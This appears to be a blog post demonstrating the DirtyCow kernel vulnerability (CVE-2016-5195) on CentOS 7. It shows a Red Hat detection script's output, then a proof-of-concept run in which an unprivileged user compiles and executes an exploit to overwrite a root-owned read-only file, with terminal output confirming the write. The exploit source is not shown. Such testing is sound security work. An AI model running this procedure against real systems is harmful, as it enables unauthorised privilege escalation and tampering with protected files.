DirtyCow – CVE-2016-5195

DirtyCow Local Privilege Escalation

Test with RH Detection Script :

[root@condor ~]# bash rh_cve_20165195.sh
Your kernel is 3.10.0-327.36.1.el7.x86_64 which IS vulnerable.
Red Hat recommends that you update your kernel. Alternatively, you can apply partial
mitigation described at https://access.redhat.com/security/vulnerabilities/2706661 .
[root@condor ~]#

Exploit code

Sample test on a Centos

[root@condor ~]# cat /etc/redhat-release
CentOS Linux release 7.2.1511 (Core)

AS root:

1 – create a file:

[root@condor ~]# echo this is not a test > /home/local/AD/lini/foo
[root@condor ~]# ls -lah /home/local/AD/lini/foo
-rw-r--r-- 1 root root 19 21 ott 09.41 /home/local/AD/lini/foo

2 – change permission

[root@condor ~]# chmod 0404 /home/local/AD/lini/foo
[root@condor ~]# ls -lah /home/local/AD/lini/foo

As user:

1 – compile the poc code

[AD\lini@condor ~]$ gcc -lpthread dirtycow_poc.c -o dirtycow

2 – verify the file permission and test to write

[AD\lini@condor ~]$ ls -lah foo
-r-----r-- 1 root root 19 21 ott 09.41 foo
[AD\lini@condor ~]$ echo pippo > foo
bash: foo: Permesso negato

3 – launch the poc

[AD\lini@condor ~]$ ./dirtycow foo pippo
mmap 985f0000

madvise 0

procselfmem 500000000

[AD\lini@condor ~]$ cat foo
pippois not a test

Updated PoCs table here

Leave a Reply

Your email address will not be published. Required fields are marked *